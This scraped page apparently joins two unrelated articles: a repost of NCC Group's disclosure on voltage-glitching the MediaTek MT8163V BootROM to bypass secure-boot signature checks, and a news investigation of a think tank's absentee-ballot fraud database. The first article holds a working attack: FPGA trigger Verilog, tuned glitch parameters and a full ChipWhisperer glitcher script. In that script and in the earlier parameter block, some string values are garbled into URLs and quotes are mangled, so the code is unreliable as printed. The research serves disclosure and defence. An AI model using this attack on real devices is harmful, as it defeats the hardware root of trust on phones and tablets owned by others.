Connect with us

Latest

There’s A Hole In Your SoC: Glitching The MediaTek BootROM

Mish Boyka

Published

on

This research was conducted by our intern Ilya Zhuravlev, who has returned to school but will be rejoining our team after graduation, and was advised by Jeremy Boone of NCC Group’s Hardware & Embedded Systems Practice.

With the advent of affordable toolchains, such as ChipWhisperer, fault injection is no longer an attack vector that is limited to well funded and highly skilled adversaries. At the same time, modern devices embed more secrets than ever, which need to be protected. This can include both encrypted user data, or proprietary vendor secrets.

Voltage glitching is a type of a fault injection attack where the supply voltage of a target device is modified to induce unanticipated behavior. Typically, this involves momentarily shorting the processor’s core voltage rail to ground, which will corrupt the internal execution state of the processor. While the side-effects of glitching may be difficult to predict accurately, by observing the system’s behavior and by tuning the glitch parameters carefully, it is possible to cause the system to, for example, skip the execution of certain instructions or to corrupt data fetch operations. Typically, these types of faults can enable an adversary to bypass critical security operations that are performed by low level software, such as when a bootloader verifies the signature of a subsequent firmware image before passing execution control to it.

In the past, most fault injection research has focused on low power microcontrollers, such as the recent attacks on the STM32 series MCUs, NXP LPC and ESP32. Given these types of microcontrollers are rarely seen in more powerful mobile phones or IoT devices, NCC Group sought to demonstrate that such attacks would succeed when applied to a more complex processor.

This blog post describes NCC Group’s methodology for characterizing the boot process of the MediaTek MT8163V system-on-chip (64-bit ARM Cortex-A), as well as the design of an apparatus that is capable of reliably producing a fault injection attack against the SoC. Ultimately, our results show that the MediaTek BootROM is susceptible to glitching, allowing an adversary to bypass signature verification of the preloader. This circumvents all secure boot functionality and enables the execution of unsigned preloader images, completely undermining the hardware root of trust.

Our work focused specifically on the MT8163V chipset, and we did not attempt this exploit against more recent variants of the SoC. However, we are aware that many MediaTek SoCs share the same BootROM-to-preloader execution flow. Our (as yet, untested) suspicion is that this vulnerability impacts other MediaTek SoC’s that are currently on the market. Given the prevalence of this platform, it would follow that this vulnerability affects a wide variety of embedded devices that use MediaTek chips including tablets, smart phones, home networking products, IoT devices, and more.

Because this vulnerability manifests in the mask ROM, the issue is unable to be patched for all in-field affected products. The severity of this issue however, depends highly on the product threat model. Voltage glitching attacks require physical access to the target device, so risk is highest in threat models where physical access is assumed, such as with mobile devices that are routinely lost or stolen. Conversely, deployments that deny attackers physical access can be treated with a suitable reduction in concern.

Selected Hardware Target

NCC Group selected a popular tablet device which uses the MediaTek MT8163V system-on-a-chip. The target was chosen based on its price, wide availability, and the fact that the PCB has many exposed and labelled test points. This simplified the circuit board reverse engineering process and made it easier to probe and glitch the board.

MediaTek Boot Process

Many MediaTek mobile and tablet SoCs follow a common boot process, as shown by the following figure. Our fault injection attack is designed to target the BootROM as it is loading and verifying the preloader executable.

MediaTek boot process

The BootROM is the immutable first stage in the boot process, and serves as the hardware root of trust for the SoC. As is typical, these SoCs contain an efuse bank that can be configured during OEM device manufacturing in order to enable secure boot and to specify the hash of the preloader signing certificate. During startup, the BootROM will read these fuses to determine the configured secure boot policy. Next, the BootROM will load the preloader from eMMC into RAM and will verify its signature before executing it.

MediaTek’s preloader is the second stage in the boot process and is the first mutable code. The preloader is stored on the BOOT0 eMMC partition. As described in section 7.2 of the eMMC specification the boot partitions are special hardware partitions, separate from the main user data partition.

eMMC partitions

Boot Process GFN

The MediaTek SoC stores two copies of the preloader in BOOT0. If the first image is corrupt (i.e. doesn’t pass the signature verification check), then the BootROM will load the second image. If both copies are corrupt, then the BootROM will enter Download Mode, as indicated by the string “[DL] 00009C40 00000000 010701” being sent over the UART.

In order to load the preloader from flash into RAM, the eMMC boot mode feature is used. Instead of sending individual READ commands, the BootROM resets the eMMC into this “alternative boot mode”. This is accomplished by sending two GO_IDLE_STATE (CMD0) commands: first with argument of 0xF0F0F0F0 which puts the card into the “pre-idle” state, then with 0xFFFFFFFA which puts it into the boot state.

GO_IDLE_STATE commands to initiate reading of BOOT0

After receiving the second command, the eMMC starts transmitting the contents of the BOOT0 partition over the DAT0 line in 1-bit mode. It takes about 100ms to receive the whole partition contents.

Transmission of BOOT0 partition contents

Once the BootROM has received the entirety of the first preloader image from the BOOT0 partition, the process is interrupted by sending a GO_IDLE_STATE reset command.

GO_IDLE_STATE command to stop BOOT0 reading

If the first preloader image is valid, our observations show that it takes about 2 seconds between when the final bytes of the preloader are transmitted and when the first eMMC command issued by the preloader is observed.

Logic analyzer capture demonstrating this 2s window (first preloader is valid)

On the other hand, if the first preloader image is invalid (that is, it fails signature verification), then this process is repeated. However, now the BootROM does not send a reset command until after the second copy of the preloader is received. In this case, it takes only about 700ms between the BootROM attempting to load the first and the second preloader images.

Logic analyzer capture demonstrating this 700ms window (first preloader is invalid)

Therefore, we assume that during the first ~700ms, the BootROM is busy parsing the preloader image structure and performing signature validation, and that the following 1.2s of execution is largely the preloader initialization code. For that reason, NCC Group decided that the voltage glitch attack should target the first 700ms window after preloader is read from eMMC.

FPGA Trigger Setup

In order to inject a voltage glitch with precise timing, a custom trigger was implemented using an inexpensive FPGA (Sipeed Tang Nano). The FPGA is connected to the eMMC CLK and DAT0 lines (while the CMD pin is also connected in the picture, it was only used for debugging with a logic analyzer).

FPGA connected to test points on the tablet

While the logic level of the FPGA is 3.3V by default, it is also able to work with 1.8V inputs without any board modifications. The output of the FPGA is a 3.3V trigger signal and is connected to the ChipWhisperer trigger input pin.

The Verilog trigger code is extremely simple: the FPGA is clocked by the eMMC clock signal and the code implements a shift register using DAT0 to keep track of the last 4 bytes transferred over the line. When the desired pattern is observed, a trigger output signal is generated for 512 eMMC clock cycles:

always @(posedge emmc_clk or negedge sys_rst_n) begin
capture <= capture;
counter <= counter;
trigger <= trigger;
if (!sys_rst_n) begin
trigger <= 1'b0;
counter <= 24'b1000000000;
capture <= 32'b0;
end else if (counter > 0) begin
counter <= counter - 1;
capture <= 32'b0;
end else if (capture == 32'h4ebbc04d) begin
trigger <= 1'b1;
counter <= 24'b1000000000;
end else begin
trigger <= 1'b0;
capture <= {capture[31:0], emmc_dat0};
end
end

The pattern being matched, 4e bb c0 4d, are the four bytes located around the end of the first copy of the preloader:

Hex dump of the preloader

The trigger output signal is then fed to the ChipWhisperer where a delay is inserted and a glitch of a specific width is generated.

Glitch Target

The ChipWhisperer platform is used to introduce voltage glitches when the FPGA trigger activates.

SMA connector on the tablet wired to test pad

An SMA connector was soldered to the side of the tablet circuit board and then connected through a wire to the target pad: VCCK_PMU. The glitch shorts VCCK_PMU to ground through ChipWhisperer’s low-power MOSFET. By dropping core voltage for a very short period of time, we expect to corrupt the internal state of the processor (such as values of the registers) without completely crashing the whole system. In order to access the VCCK_PMU pad, a portion of soldermask was scratched off the PCB with a knife. No other board modifications were performed (i.e. we did not find that it was necessary to remove decoupling capacitors as is sometimes necessary).

Overall Setup

The overall setup of the glitching apparatus and its connections are shown in the following diagram.

Glitching apparatus block diagram

The following hardware was used to perform the attack:

  • 1.8v UART: A UART adapter which uses 1.8v logic level. This is used so that we can see target output and determine when a glitch attempt has succeeded ($2 USD).
  • RaspberryPi: Used to programmatically reset the target device by disabling and re-enabling USB power with uhubctl ($50 CAD, CanaKit).
  • FPGA: Passively listens to eMMC traffic and outputs glitch trigger signal to ChipWhisperer ($10 CAD, Digikey).
  • ChipWhisperer: Inserts voltage glitches after the trigger signal is activated ($325 USD, NewAE Technology).

Determining The Initial Glitch Parameters

The following parameters were used to set up the ChipWhisperer glitch:

scope.glitch.clk_src = "https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/clkgen" 
scope.glitch.output = "enable_only" 
scope.glitch.trigger_src = "https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/ext_single" 
scope.clock.clkgen_freq = 16000000 
scope.io.glitch_lp = True 
scope.io.glitch_hp = False

Next, it was necessary to determine the target glitch width. To accomplish this, glitches of different widths were manually injected while the device was executing in the BootROM and preloader. Glitch widths of around 80-100 clock cycles were observed to introduce various types of state corruption in the preloader. However, many of these state corruptions did not appear to be exploitable. For example the following output was observed during one of the iterations:

[2176] [PART] check_part_overlapped done
[2180] [PART] load "tee1" from 0x0000000000B00200 (dev) to 0x43001000 (mem) [SUCCESS] 
[2181] [PART] load speed: 15000KB/s, 46080 bytes, 3ms
[2213] [platform] ERROR: <ASSERT> div0.c:line 41 0 
[2213] [platform] ERROR: PL fatal error... 
[2214] [platform] PL delay for Long Press Reboot

Bruteforcing the Correct Glitch Parameters

As stated previously, we assumed that the signature check occurs within the 700ms window after the final GO_IDLE_STATE command. In order to cover the whole 700ms of timing, a gradual bruteforce approach was used.

First, an unmodified and properly signed preloader was loaded into the eMMC BOOT0 partition. Then, a coarse bruteforce was performed in the offset range [25400, 100000] with a step size of 200 cycles. The assumption was that a useful glitch offset would cause the device either to crash (no output seen on UART), or be put in DL mode (“[DL] 00009C40 00000000 010701” output string observed on the UART).

Through this experimentation process, we determined that most of the attempted offsets resulted in no apparent change in device behavior and the preloader was loaded and ran as normal. However, after several hours of running this first-stage bruteforce, multiple areas of interest were identified and a more granular bruteforce was applied to them. This fine grained approach used step values of 20 cycles instead of 200 cycles.

At this point, NCC Group tampered with the preloader image by modifying a debug string. The BootROM should refuse to load this tampered image due to a failed signature check. However, we will know if the glitch was successful if this tampered image is loaded and executed. NCC Group once again identified areas of interest, and continued bruteforcing the glitch parameters. After about 2 hours of bruteforce, several successful glitches were confirmed. However, these successes were unreliable, and more fine tuning was needed.

Next, the bruteforce was fine-tuned around these specific offsets and widths to discover the perfect glitch parameters. With the proper parameters, and several days worth of bruteforce, we were able to achieve a 15-20% success rate for bypassing the signature check. The following table summarizes the statistical output from these runs, demonstrating that multiple sets of parameters (width and offset) were able to achieve a successful glitch.

Width Offset Success Run Total Runs Success Rate
94 41428 122 802 15.21%
93 41430 154 802 19.20%
94 41431 156 803 19.43%
127 41431 176 803 21.92%
129 41431 167 803 20.80%
93 41432 182 803 22.67%
115 41432 168 803 20.92%
117 41432 188 802 23.44%
126 41432 161 802 20.07%
130 41432 181 803 22.54%
117 41433 180 803 22.42%
118 41433 178 802 22.19%
129 41433 158 802 19.70%
100 41434 147 803 18.31%
103 41434 162 803 20.17%
104 41434 163 803 20.30%
128 41434 180 803 22.42%
129 41434 169 802 21.07%
130 41434 176 803 21.92%
103 41435 157 803 19.55%
104 41435 187 803 23.29%
126 41435 167 803 20.80%
128 41435 161 803 20.05%
100 41436 160 803 19.93%
102 41436 169 802 21.07%
100 41437 160 803 19.93%
102 41438 158 803 19.68%
103 41438 157 803 19.55%
104 41438 147 802 18.33%

Notice that all successful glitches are clustered around a narrow range of widths (93-130) and offsets (41428-41438). These values can be used with the provided ChipWhisperer script, at this end of this blog post.

Payload Execution

Beyond simply tampering with a debug string, our goal is to execute arbitrary code. So next, a payload was injected into the preloader binary, replacing a portion of the string section. The preloader was also modified to jump to the payload around where it would normally perform GPT parsing. The specific place, located in the later stage of the preloader, was chosen because after the glitch has succeeded, the UART has to be reconfigured with different baud rate parameters, which takes some time and results in early output from the preloader being lost.

The injected payload will print a log message and then read out BootROM memory and EFUSE contents. A successful glitch attempt is shown in the UART output below:

Dry run 
Dry run done, go!
105 41431 b'x00[DL] 00009C40 00000000 010701nr' 
105 41433 b'x00' 
99 41432 b'x00nrF0: 102B 0000nrF3: 4000 0036nrF3: 0000 0000nrV0: 0000 0000 [0001]nr00: 0007 4000nr01: 0000 0000nrBP: 0000 0209 [0000]nrG0: 0190 0000nrT0: 0000 038B [000F]nrJump to BLnrnrxfdxf0' 
Glitched after 10.936420202255249s, reopening serial!

<snip>

[1167] [Dram_Buffer] dram_buf_t size: 0x1789C0
[1167] [Dram_Buffer] part_hdr_t size: 0x200
[1168] [Dram_Buffer] g_dram_buf start addr: 0x4BE00000
[1169] [Dram_Buffer] g_dram_buf->msdc_gpd_pool start addr: 0x4BF787C0
[1169] [Dram_Buffer] g_dram_buf->msdc_bd_pool start addr: 0x4BF788C0
[1187] [RAM_CONSOLE] sram(0x12C000) sig 0x0 mismatch
[1188] [RAM_CONSOLE] start: 0x44400000, size: 0x10000
[1188] [RAM_CONSOLE] sig: 0x43074244
[1189] [RAM_CONSOLE] off_pl: 0x40
[1189] [RAM_CONSOLE] off_lpl: 0x80
[1189] [RAM_CONSOLE] sz_pl: 0x10
[1190] [RAM_CONSOLE] wdt status (0x0)=0x0

<snip>

———————————————————————-
MediaTek MT8163V voltage glitch proof of concept NCC Group 2020
———————————————————————-
BootROM:
00000000: 08 00 00 EA FE FF FF EA FE FF FF EA FE FF FF EA
00000010: FE FF FF EA FE FF FF EA FE FF FF EA FE FF FF EA
00000020: BB BB BB BB 38 00 20 10 00 00 A0 E3 00 10 A0 E3
00000030: 00 20 A0 E3 00 30 A0 E3 00 40 A0 E3 00 50 A0 E3
00000040: 00 60 A0 E3 00 70 A0 E3 00 80 A0 E3 00 90 A0 E3
00000050: …

EFUSE:
10206000: 11 00 0F 00 62 00 00 00 00 00 00 00 00 00 00 00
10206010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206040: 00 10 02 04 00 00 50 0C 00 00 00 00 00 00 00 00
10206050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206060: 46 08 00 00 00 00 00 00 07 00 00 00 00 00 00 00
10206070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206090: 47 C8 DE F6 A6 A9 A1 8B 7A 8D 71 91 06 BC 18 86
102060A0: 9F 97 E1 CD A3 7C 4C E8 AB E8 7F 60 E8 A6 FD 77
102060B0: …

 

At this point, we have shown that our glitching technique was successful and that the injected payload is able execute arbitrary code. Although, not demonstrated, it would also be possible to perform any highly-privileged operations that the preloader is normally responsible for, such as decrypting and loading a modified TrustZone image, loading a malicious LK/Android image, and so on.

Conclusion

We have demonstrated that the MediaTek MT8163V SoC is susceptible to voltage glitching attacks. Furthermore, we observed a high glitch success rate without the need for advanced setup of the glitching apparatus (e.g. clock synchronization or removing capacitors from the board). While each set of glitch parameters has an approximate 20% success rate, an adversary can trivially achieve a 100% overall success rate by simply rebooting between glitch attempts.

Because this vulnerability affects the BootROM, it cannot be patched in the field, and as-such all in-field products will remain vulnerable indefinitely. In our conversations with MediaTek leading up to this disclosure, MediaTek indicated plans to implement fault injection mitigations in the BootROM of an upcoming and unnamed SoC. We were not given the opportunity to evaluate the effectiveness of these mitigations, or whether they are hardware-based or software-based.

NCC Group serves as a strategic security advisor to many semiconductor companies as well as companies that design and manufacture embedded devices such as smartphones or IoT products. In support of holistic security engineering, we advise our clients to consider mitigations to fault injection attacks. For voltage-glitching, hardware-based mitigations such as fast-reacting in-silicon brown-out detection circuitry, are the most effective defense. Alternatively, software-based mitigations may also be employed, though they only raise the bar for an adversary, and do not completely mitigate the attack. Example software-based mitigations include:

  • Redundantly perform critical checks, terminating execution if conflicting results are produced. This mitigation forces the attacker to perform multiple successive glitches in order to bypass a single critical security check.
  • Insert random-duration delays at various points throughout security-critical code. This mitigation forces the attacker to implement multiple accurate trigger conditions.
  • Implement control flow integrity within the BootROM, especially around security critical sections of code. This mitigation may help detect when an injected fault causes the program to execute unexpected code paths, such as skipping branch instructions.

For device OEMs, mitigations are more difficult. They often have limited ability to influence the glitch resistance properties implemented by their upstream silicon vendors. In this case, NCC Group recommends that device OEMs work closely with their suppliers to understand the security posture of the components. Where gaps in understanding exist, consider third-party assessments. This GFN must be done early during the component selection phase, so that useful comparisons among possible vendor components can take place. Only those components that meet the security objectives and threat models of the product should be considered for use. Above the chipset level, additional layers of physical protection can help slow an attack of this nature, including careful PCB design, a wide range of anti-tamper measures, and the judicious use of cryptography protect vital user data.

For users and consumers who are even further removed from the implementation of the BootROM, it is important to purchase devices from vendors who demonstrate a commitment to security in their products. This is particularly true for mobile devices which are easily lost or stolen, and hence vulnerable to the types of physical attacks discussed here. Lowest price too often means the least attention to the importance of security. Look for positive security traits, such as bug bounty programs, published security whitepapers, product security marks such as ioXt, regular firmware update cadence, and a general history of positively responding to publicly known security vulnerabilities.

Disclosure Timeline

  • 2020-06-16: Sent disclosure via MediaTek’s web-based reporting form.
  • 2020-07-03: Received no response, so reached out to industry contacts for assistance on contacting MediaTek PSIRT.
  • 2020-07-13: Emailed multiple MediaTek employees hoping one could redirect my inquiry to their PSIRT.
  • 2020-07-13: Received response and directed to GPG encrypt the disclosure and send to MTK’s PSIRT email alias.
  • 2020-07-14: Sent the disclosure.
  • 2020-07-15: MediaTek acknowledge receipt of disclosure.
  • 2020-07-16: MediaTek requested conference call to discuss.
  • 2020-07-23: Held conference call to discuss the vulnerability.
  • 2020-07-27: Answered additional questions about the vulnerability.
  • 2020-09-30: MediaTek requests to see disclosure document prior to publication.
  • 2020-10-07: NCC Group provided MTK with draft advisory blog post.
  • 2020-10-15: Disclosure publication

Appendix: Glitcher Source Code

import chipwhisperer as cw 
import time 
import serial 
import subprocess 
import sys

start = time.time()

scope = cw.scope()
scope.glitch.clk_src = “https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/clkgen”
scope.glitch.output = “enable_only”
scope.glitch.trigger_src = “https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/ext_single”
scope.clock.clkgen_freq = 16000000
scope.io.glitch_lp = True
scope.io.glitch_hp = False

SERIAL = “/dev/ttyUSB0”
RPI = “192.168.0.18”

def power_off():
subprocess.check_output([“ssh”, “root@{}”.format(RPI),
“/root/uhubctl/uhubctl -l 1-1 -p 2 -a 0”])

def power_on():
subprocess.check_output([“ssh”, “root@{}”.format(RPI),
“/root/uhubctl/uhubctl -l 1-1 -p 2 -a 1”])

ser = serial.Serial(SERIAL, 115200, timeout=0.1)

print(“Dry run”)
power_off()
scope.glitch.repeat = 10
scope.glitch.ext_offset = 0
scope.arm() power_on()
for x in range(10):
data = ser.read(100000)
power_off()
print(“Dry run done, go!”)

def glitch_attempt(offset, width):
power_off()
scope.glitch.repeat = width
scope.glitch.ext_offset = offset
scope.arm()
power_on()
data = b””
for x in range(30):
data += ser.read(100000)
if b”[DL]” in data and b”nr” in data:
break
if b”Jump to BL” in data and b”nr” in data:
break
print(width, offset, data)
if b”Jump” in data:
print(“Glitched after {}s, reopening serial!nn”.format(
time.time() – start))
ser.close()
ser2 = serial.Serial(SERIAL, 921600, timeout=0.1)
while True:
data = ser2.read(10000)
sys.stdout.buffer.write(data)
sys.stdout.flush()
try:
while True:
for width, offset in [
(105, 41431), (105, 41433), ( 99, 41432), (101, 41434),
(127, 41430), (104, 41432), (134, 41431), (135, 41434),
]:
glitch_attempt(offset, width)
finally:
print(“Turn off”)
power_off()
print(“Disable scope”)
scope.dis()
print(“Bye!n”)

Election

We analyzed a conservative foundation’s catalog of absentee ballot fraud. It’s not a 2020 election threat

Avatar

Published

on

By

Leila and Gary Blake didn’t want to miss elk hunting season.

It was 2000, and the election conflicted with their plans, so the Wyoming couple requested absentee ballots.

But the Blakes had moved from 372 Curtis Street five miles down the road to 1372 Curtis Street, crossing a town line. When they mailed their votes using the old address, they were criminally charged. The misdemeanor case was settled with $700 in fines and a few months’ probation, but two decades later, the Blakes are still listed as absentee ballot fraudsters in the Heritage Foundation’s Election Fraud Database.

Far from being proof of organized, large-scale vote-by-mail fraud, the Heritage database presents misleading and incomplete information that overstates the number of alleged fraud instances and includes cases where no crime was committed, an investigation by USA TODAY, Columbia Journalism Investigations and the PBS series, FRONTLINE found.

Although the list has been used to warn against a major threat of fraud, a deep look at the cases in the list shows that the vast majority put just a few votes at stake.

Fox News host Sean Hannity has repeatedly touted the Heritage Foundation's database of election fraud cases.
Fox News host Sean Hannity has repeatedly touted the Heritage Foundation’s database of election fraud cases.

The database is the result of a years-long passion project by Hans von Spakovsky, a former member of the U.S. Department of Justice during the George W. Bush administration and a senior legal fellow with the Heritage Foundation, a conservative think tank. The entire Election Fraud Database contains 1,298 entries of what the think tank describes as “proven instances of voter fraud.” It has been amplified by conservative media stars and was submitted to the White House document archives as part of a failed effort to prove that voter fraud ran rampant during the 2016 election.

But the Blakes’ address violation is typical of the kind of absentee ballot cases in the database. It appears along with widows and widowers who voted for a deceased loved one, voters confused by recent changes to the law and people never convicted of a crime.

The Heritage database does not include a single example of a concerted effort to use absentee ballot fraud to steal a major election, much less a presidential election, as President Donald Trump has suggested could happen this year. Though Trump has repeatedly claimed that absentee ballot fraud is widespread, only 207 of the entries in the Heritage database are listed under the fraudulent absentee ballot category. Not only is that a small slice of the overall Heritage database, it represents an even smaller portion of the number of local, state and national elections held since 1979, which is as far back as the database goes.

To examine the facts behind the rhetoric, reporters looked at each case in Heritage’s online category of “Fraudulent use of absentee ballots,” comparing them with state investigations, court documents and news clips. Roughly one in 10 cases involves a civil penalty and no criminal charge. Some of the cases, such as the one involving the Blakes, do not match the online definition of absentee fraud as stated by the Heritage Foundation itself. Four cases did not involve absentee ballots at all, including a 1996 murder-for-hire case that included a person persuaded to illegally vote using a wrong address.

A voter drops their ballot off during early voting, Monday, Oct. 19, 2020, in Athens, Ga.
A voter drops their ballot off during early voting, Monday, Oct. 19, 2020, in Athens, Ga.

In recent months, von Spakovsky has cited the database to warn about the dangers of voting by mail, including during podcast interviews with U.S. Rep. Dan Crenshaw and former U.S. House Speaker Newt Gingrich.

In a written response for this story, von Spakovsky — the manager of the Heritage Foundation’s Election Law Reform Initiative — called the database “factual, backed up by proof of convictions or findings by courts or government bodies in the form of reports from reputable news sources and/or court records.”

He acknowledges that the database is elastic enough to pull in civil cases, as well as criminal cases closed with no conviction. “Some suffered civil sanctions. Others suffered administrative rebukes,” von Spakovsky said. In the case of criminal convictions, the database “does not discriminate between serious and minor cases.” Charges listed in the description “add the necessary context,” he wrote.

Even with such a broad definition, the Brennan Center for Justice in its 2017 examination of the full database found scant evidence supporting claims of significant, proven fraud. It did conclude the cases added up to “a molecular fraction” of votes cast nationwide. Von Spakovsky has countered that the database is a sampling of cases that have publicly surfaced.

“We simply report cases of which we become aware,” he said.

But if the Heritage database is a sample, it points to a larger universe of cases that are just as underwhelming.

“It illustrates that almost all of the voting fraud allegations tend to be small scale, individual acts that are not calculated to change election outcomes,” said Rick Hasen, election law author and professor of law and political science at the University of California, Irvine.

To be sure, there are exceptions. In North Carolina, a Republican political consultant was indicted and the results of a 2018 congressional race overturned based on an absentee ballot operation.

“But by and large the allegations are penny-ante,” Hasen said. “Some are not crimes at all.”

Relatively small number of votes at stake

Following unsubstantiated claims that “millions and millions” of fraudulent votes cast in the 2016 election had cost him the popular vote, Trump in 2017 created the Presidential Advisory Commission on Election Integrity to investigate stories of voter fraud.

Joining the panel was von Spakovsky, whose appointment was considered controversial. In an email obtained by the Campaign Legal Center, he urged that Democrats should be barred from the task force, arguing they would obstruct the panel’s work. He also wrote, of moderate Republicans: “There aren’t any that know anything about this or who have paid attention to the issue over the years.” He submitted the Heritage database almost immediately into the commission’s official documents.

The task force disbanded seven months after its first meeting with no report substantiating fraud. The White House blamed the potential cost of lawsuits and uncooperative states for the failure to produce evidence of widespread voter fraud.

Then-Kansas Secretary of State Kris Kobach met with Trump after the presidential election to propose an investigation into voter fraud. Trump established a commission to investigate, but ultimately disbanded it without any substantiated findings of widespread voter fraud.
Then-Kansas Secretary of State Kris Kobach met with Trump after the presidential election to propose an investigation into voter fraud. Trump established a commission to investigate, but ultimately disbanded it without any substantiated findings of widespread voter fraud.

A review of the absentee cases in the Heritage Foundation database helps explain why the panel came up short, and why such fraud is not a reasonable threat to undermine the 2020 general election.

In multiple instances, only one or two votes were involved. In other cases, no fraudulent votes were involved but are still included in the database because people ran afoul of rules on helping others fill out ballots or ballot requests. For example, a nursing home worker was civilly fined $100 because she did not sign her name and address as an “assistor” on ballots she helped four elderly patients fill out. In another case, a mother was fined $200 because she signed her sons’ requests for absentee ballots.

Events in the database also can be older than they seem because Heritage frequently categorizes entries by dates of an indictment, report or conviction, which may come years after the fraud. Using the year of the incident, 137 of 207 cases occurred before 2012.

Working in bipartisan pairs, canvassers process mail-in ballots in a warehouse at the Anne Arundel County Board of Elections headquarters on October 7, 2020 in Glen Burnie, Maryland. The ballot canvas for mail-in and absentee ballots began on October 1st in Maryland, the earliest in the country. Every ballot goes through a five step process before being sliced open and tabulated.
Working in bipartisan pairs, canvassers process mail-in ballots in a warehouse at the Anne Arundel County Board of Elections headquarters on October 7, 2020 in Glen Burnie, Maryland. The ballot canvas for mail-in and absentee ballots began on October 1st in Maryland, the earliest in the country. Every ballot goes through a five step process before being sliced open and tabulated.

Overall, the total number of absentee cases in the Heritage Foundation database is 153, with 207 entries in the category because multiple people are sometimes listed for the same case. Of those cases, 39 of them — involving 66 people — represent cases in which there seemed to be an organized attempt to tip an election, based on reporting and the group’s own description.

Further, the database describes “cases,” not individuals charged. However, the total number of cases became inflated after Heritage began counting every person involved in a criminal ring as a separate case.

“Each individual is a separate case and involved different … acts of voter fraud,” even if the parties conspired, von Spakovsky said. The Heritage Foundation may reconsider how groups of defendants are counted, but if anything, he said, the number of cases is undercounted, not overcounted.

But the details of the cases compiled in the database undermine the claim that voter fraud is a threat to election integrity.

In Seattle, an elderly widow and a widower appeared in court the same day, having voted for their recently deceased spouses — two of 15 in the database where an individual cast the ballot of a recently deceased parent, wife or husband. “The motivation in these cases was not to throw an election,” the prosecutor of the Seattle case told the Seattle Post-Intelligencer. “The defendants are good and honorable people.”

Lorraine Minnite, a Rutgers University political science professor who has written extensively on voter behavior, said of the Heritage Foundation database: “They slapped it together.

“They must have thought people would not think about it in a deep way,” Minnite said. “They can just slam it on the desk, say some number. The context and accuracy goes out the window.”

Signage for ballots with errors is seen in a warehouse at the Anne Arundel County Board of Elections headquarters on October 7, 2020 in Glen Burnie, Maryland. The ballot canvas for mail-in and absentee ballots began on October 1st in Maryland, the earliest in the country. Every ballot goes through a five step process before being sliced open and tabulated.
Signage for ballots with errors is seen in a warehouse at the Anne Arundel County Board of Elections headquarters on October 7, 2020 in Glen Burnie, Maryland. The ballot canvas for mail-in and absentee ballots began on October 1st in Maryland, the earliest in the country. Every ballot goes through a five step process before being sliced open and tabulated.

Andrea “Andy” Bierstedt was accused of taking one ballot belonging to another voter to the post office in a 2010 Texas sheriff’s race. Campos said prosecutors allowed her to donate $3,500 to the county food bank as part of a plea. She wrote the check and she has no conviction. Yet she’s in the database.

“This database is really saying that I’m guilty when even the courts say I’m not guilty,” said Bierstedt, who did not know her name was on a compilation of voter fraud cases. “It’s slander.”

Others captured in the database stumbled on changes in law. Providing assistance, such as the delivery of an absentee ballot, had been legal in 2003 in Texas, and in 2004, that’s what Hardeman County Commission candidate Johnny Akers did. “I didn’t understand you couldn’t mail some little old lady’s ballot,” Akers told the Wichita Falls Times Record News.

After Brandon Dean won the Brighton, Alabama, 2016 mayor’s race, a losing candidate sued over absentee ballots.

“This isn’t about voting fraud,” the judge in the civil trial said. Ballots rejected by the judge for apparent voter mistakes triggered a runoff, and Dean declined to run.

Dean’s case, however, appears in the Heritage database.

Percy Gill’s re-election to the Wetumpka, Alabama town council the same year also prompted a rival to sue, and a civil judge also overturned the election because of defective absentee ballots. Gill died last year.

“I don’t know why they put him on the [Heritage] database,” said his friend Michael Jackson, the District Attorney for Alabama’s Fourth Judicial District. “He was a very honest man, an upstanding official.”

‘It wasn’t anything big to begin with’

The Heritage voter fraud database correctly notes that Miguel Hernandez was arrested as part of a larger voting fraud investigation in the Dallas area.

Hernandez, who pleaded guilty to improperly returning a marked ballot in a city council election, had knocked on voters’ doors, volunteered to request absentee ballots on their behalf, signed the requests under a forged name and then collected ballots for mailing.

A box of absentee ballots wait to be counted at the Albany County Board of Elections in Albany, N.Y. on June 30, 2020.
A box of absentee ballots wait to be counted at the Albany County Board of Elections in Albany, N.Y. on June 30, 2020.

But Heritage did not include the fact that the investigation went nowhere. Voters told prosecutors their mailed votes were accurately recorded.

“It did not materialize into anything bigger simply because it wasn’t anything big to begin with,” said Andy Chatham, a former Dallas County assistant district attorney who helped prosecute Hernandez. “This was not a voter fraud case.”

Yet according to the Heritage Foundation’s fraud database, Hernandez’s scheme involved up to 700 ballots.

“Absolutely hilarious,” said Bruce Anton, Hernandez’s defense attorney. “There is no indication that anything like that was ever, ever considered.”

The legend of Hernandez’s activities grew even more when U.S. Attorney General William Barr recently held Hernandez out as an example of fraud, boosting the number of ballots. “We indicted someone in Texas, 1,700 ballots collected, he — from people who could vote, he made them out and voted for the person he wanted to.”

The Department of Justice had not indicted Hernandez. A spokeswoman told reporters Barr had been given inaccurate information.

Fraud exists, and the system to catch it works

While fewer and farther between, legitimate absentee fraud is also reflected in the database. Ben Cooper and 13 other individuals faced 243 felony charges in 2006 in what was described as Virginia’s worst election fraud in half a century. The mayor of tiny Appalachia, Cooper and his associates stole absentee ballots and bribed voters with booze, cigarettes and pork rinds so that they could repeatedly vote for themselves.

But the case is an example of just how difficult it is to organize and execute absentee fraud on a scale significant enough to swing an election while also avoiding detection. Heritage’s compilation of known absentee cases show the schemes repeatedly occurred in local races, frequently in smaller towns where political infighting can be fierce and fraudsters easily identified. Just one voter who told her story to The Roanoke Times unraveled Cooper’s ring.

The idea that absentee fraud frequently involves few votes and is easily caught is “laughable,” von Spakovsky said. He cited as an example the 1997 Miami mayoral race, which was riddled with absentee fraud.

However, that fraud scheme also quickly collapsed: The election took place in November, the Miami Herald began exposing the fraud in December, a civil trial started in February and a judge overturned the election in March.

“There have been some ham-handed attempts in small scale fraud, but I would be very surprised to see large scale efforts that go undetected,” Hasen said. “It is very hard to fly under the radar.”

